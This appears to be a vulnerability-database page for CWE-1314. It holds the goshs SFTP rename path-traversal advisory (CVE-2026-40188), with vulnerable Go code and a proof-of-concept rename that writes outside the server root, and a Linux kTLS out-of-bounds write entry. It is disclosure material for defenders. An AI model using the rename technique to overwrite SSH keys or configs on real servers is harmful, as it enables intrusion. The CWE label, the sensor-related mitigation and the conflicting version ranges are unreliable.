CWE-1314
AllowedMissing Write Protection for Parametric Data Values
Abstraction: Base · Status: Draft
The device does not write-protect the parametric data values for sensors that scale the sensor value, allowing untrusted software to manipulate the apparent result and potentially damage hardware or cause operational failure.
3 vulnerabilities reference this CWE, most recent first.
CVE-2026-40188 (GCVE-0-2026-40188)
Vulnerability from cvelistv5 – Published: 2026-04-10 19:43 – Updated: 2026-04-13 15:35- CWE-1314 - Missing Write Protection for Parametric Data Values
| URL | Tags |
|---|---|
| https://github.com/patrickhener/goshs/security/ad… | x_refsource_CONFIRM |
| https://github.com/patrickhener/goshs/commit/141c… | x_refsource_MISC |
| https://github.com/patrickhener/goshs/releases/ta… | x_refsource_MISC |
| Vendor | Product | Version | |
|---|---|---|---|
| patrickhener | goshs |
Affected:
>= 1.0.7, < 2.0.0-beta.4
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-40188",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-13T15:28:25.294603Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-13T15:35:32.574Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-2943-crp8-38xx"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "goshs",
"vendor": "patrickhener",
"versions": [
{
"status": "affected",
"version": "\u003e= 1.0.7, \u003c 2.0.0-beta.4"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "goshs is a SimpleHTTPServer written in Go. From 1.0.7 to before 2.0.0-beta.4, the SFTP command rename sanitizes only the source path and not the destination, so it is possible to write outside of the root directory of the SFTP. This vulnerability is fixed in 2.0.0-beta.4."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1314",
"description": "CWE-1314: Missing Write Protection for Parametric Data Values",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-10T19:43:45.197Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/patrickhener/goshs/security/advisories/GHSA-2943-crp8-38xx",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-2943-crp8-38xx"
},
{
"name": "https://github.com/patrickhener/goshs/commit/141c188ce270ffbec087844a50e5e695b7da7744",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/patrickhener/goshs/commit/141c188ce270ffbec087844a50e5e695b7da7744"
},
{
"name": "https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.4",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.4"
}
],
"source": {
"advisory": "GHSA-2943-crp8-38xx",
"discovery": "UNKNOWN"
},
"title": "goshs is Missing Write Protection for Parametric Data Values"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-40188",
"datePublished": "2026-04-10T19:43:45.197Z",
"dateReserved": "2026-04-09T20:59:17.620Z",
"dateUpdated": "2026-04-13T15:35:32.574Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
GHSA-2943-CRP8-38XX
Vulnerability from github – Published: 2026-04-10 20:00 – Updated: 2026-06-08 20:08Summary
The SFTP command rename sanitizes only the source path and not the destination, so it is possible to write outside of the root directory of the SFTP.
Details
Here is the issue:
// helper.go:155-215
func cmdFile(root string, r *sftp.Request, ip string, sftpServer *SFTPServer) error {
fullPath, err := sanitizePath(r.Filepath, root) // Source: SANITIZED
if err != nil {
return err
}
switch r.Method {
// ...
case "Rename":
err := os.Rename(fullPath, r.Target) // Destination: NOT SANITIZED!
PoC
To exploit just upload a file on the SFTP and rename it to a file with full path.
Currently no key.txt file inside /tmp
$ ls key.txt
ls: key.txt: No such file or directory
Start the SFTP server:
/tmp/sftp-server $ goshs -sftp -b 'user:user' -d .
WARNING[2026-04-02 20:00:18] upload-folder mode deactivated due to use of 'sftp' mode
WARNING[2026-04-02 20:00:18] There is a newer Version (v2.0.0-beta.3) of goshs available. Run --update to update goshs.
INFO [2026-04-02 20:00:18] Starting SFTP server on port 0.0.0.0:2022
WARNING[2026-04-02 20:00:18] You are using basic auth without SSL. Your credentials will be transferred in cleartext. Consider using -s, too.
INFO [2026-04-02 20:00:18] Using basic auth with user 'user' and password 'user'
INFO [2026-04-02 20:00:18] Download embedded file at: /example.txt?embedded
INFO [2026-04-02 20:00:18] Serving on interface lo0 bound to 127.0.0.1:8000
INFO [2026-04-02 20:00:18] Serving on interface en0 bound to 192.168.68.51:8000
INFO [2026-04-02 20:00:18] Serving HTTP from /tmp/sftp-server
Connect to the SFTP and uploading the file:
$ sftp -P 2022 user@localhost
user@localhost's password:
Connected to localhost.
sftp> put /Users/user/Downloads/key.txt
Uploading /Users/user/Downloads/key.txt to /tmp/sftp-server/key.txt
key.txt 100% 15 40.9KB/s 00:00
The file is stored properly.
goshs log:
INFO [2026-04-02 20:03:31] SFTP: [::1]:61742 - [Put] - "/tmp/sftp-server/key.txt"
Rename command with full path:
sftp> rename key.txt /tmp/key.txt
goshs log:
INFO [2026-04-02 20:04:09] SFTP: [::1]:61742 - [Rename] - "/tmp/sftp-server/key.txt to /tmp/key.txt"
Key file is now in /tmp
$ ls key.txt
key.txt
Impact
This allows file write and can be used either for an RCE in form of overwrite an SSH key, or by overwriting a configuration etc.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/patrickhener/goshs"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.7"
},
{
"last_affected": "1.1.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-40188"
],
"database_specific": {
"cwe_ids": [
"CWE-1314"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-10T20:00:28Z",
"nvd_published_at": "2026-04-10T20:16:23Z",
"severity": "HIGH"
},
"details": "### Summary\nThe SFTP command rename sanitizes only the source path and not the destination, so it is possible to write outside of the root directory of the SFTP. \n\n### Details\n\nHere is the issue:\n```go\n// helper.go:155-215\nfunc cmdFile(root string, r *sftp.Request, ip string, sftpServer *SFTPServer) error {\n fullPath, err := sanitizePath(r.Filepath, root) // Source: SANITIZED\n if err != nil {\n return err\n }\n switch r.Method {\n // ...\n case \"Rename\":\n err := os.Rename(fullPath, r.Target) // Destination: NOT SANITIZED!\n```\n\n\n### PoC\n\nTo exploit just upload a file on the SFTP and rename it to a file with full path. \n\nCurrently no key.txt file inside /tmp\n\n``` bash\n$ ls key.txt\nls: key.txt: No such file or directory\n```\n\n\nStart the SFTP server:\n``` bash\n/tmp/sftp-server $ goshs -sftp -b \u0027user:user\u0027 -d .\nWARNING[2026-04-02 20:00:18] upload-folder mode deactivated due to use of \u0027sftp\u0027 mode\nWARNING[2026-04-02 20:00:18] There is a newer Version (v2.0.0-beta.3) of goshs available. Run --update to update goshs.\nINFO [2026-04-02 20:00:18] Starting SFTP server on port 0.0.0.0:2022\nWARNING[2026-04-02 20:00:18] You are using basic auth without SSL. Your credentials will be transferred in cleartext. Consider using -s, too.\nINFO [2026-04-02 20:00:18] Using basic auth with user \u0027user\u0027 and password \u0027user\u0027\nINFO [2026-04-02 20:00:18] Download embedded file at: /example.txt?embedded\nINFO [2026-04-02 20:00:18] Serving on interface lo0 bound to 127.0.0.1:8000\nINFO [2026-04-02 20:00:18] Serving on interface en0 bound to 192.168.68.51:8000\nINFO [2026-04-02 20:00:18] Serving HTTP from /tmp/sftp-server\n```\n\nConnect to the SFTP and uploading the file:\n``` bash\n$ sftp -P 2022 user@localhost\nuser@localhost\u0027s password:\nConnected to localhost.\nsftp\u003e put /Users/user/Downloads/key.txt\nUploading /Users/user/Downloads/key.txt to /tmp/sftp-server/key.txt\nkey.txt 100% 15 40.9KB/s 00:00\n```\n\nThe file is stored properly. \n\ngoshs log:\n```\nINFO [2026-04-02 20:03:31] SFTP: [::1]:61742 - [Put] - \"/tmp/sftp-server/key.txt\"\n```\n\nRename command with full path:\n``` bash\nsftp\u003e rename key.txt /tmp/key.txt\n```\n\ngoshs log:\n```\nINFO [2026-04-02 20:04:09] SFTP: [::1]:61742 - [Rename] - \"/tmp/sftp-server/key.txt to /tmp/key.txt\"\n```\n\nKey file is now in /tmp\n```\n$ ls key.txt\nkey.txt\n```\n\n\n### Impact\nThis allows file write and can be used either for an RCE in form of overwrite an SSH key, or by overwriting a configuration etc.",
"id": "GHSA-2943-crp8-38xx",
"modified": "2026-06-08T20:08:46Z",
"published": "2026-04-10T20:00:28Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-2943-crp8-38xx"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40188"
},
{
"type": "WEB",
"url": "https://github.com/patrickhener/goshs/commit/141c188ce270ffbec087844a50e5e695b7da7744"
},
{
"type": "PACKAGE",
"url": "https://github.com/patrickhener/goshs"
},
{
"type": "WEB",
"url": "https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "goshs is Missing Write Protection for Parametric Data Values"
}
GHSA-QMFF-49XC-7RF6
Vulnerability from github – Published: 2024-01-17 18:31 – Updated: 2024-11-25 12:33An out-of-bounds memory write flaw was found in the Linux kernel’s Transport Layer Security functionality in how a user calls a function splice with a ktls socket as the destination. This flaw allows a local user to crash or potentially escalate their privileges on the system.
{
"affected": [],
"aliases": [
"CVE-2024-0646"
],
"database_specific": {
"cwe_ids": [
"CWE-1314",
"CWE-787"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-01-17T16:15:47Z",
"severity": "HIGH"
},
"details": "An out-of-bounds memory write flaw was found in the Linux kernel\u2019s Transport Layer Security functionality in how a user calls a function splice with a ktls socket as the destination. This flaw allows a local user to crash or potentially escalate their privileges on the system.",
"id": "GHSA-qmff-49xc-7rf6",
"modified": "2024-11-25T12:33:22Z",
"published": "2024-01-17T18:31:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0646"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"type": "WEB",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c5a595000e267"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253908"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2024-0646"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:2094"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:1404"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:1382"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:1377"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:1368"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:1367"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:1306"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:1278"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:1269"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:1268"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:1253"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:1251"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:1250"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:1248"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:0897"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:0881"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:0876"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:0851"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:0850"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:0725"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:0724"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:0723"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
Access controls for sensor blocks should ensure that only trusted software is allowed to change threshold limits and sensor parametric data.
CAPEC-1: Accessing Functionality Not Properly Constrained by ACLs
In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.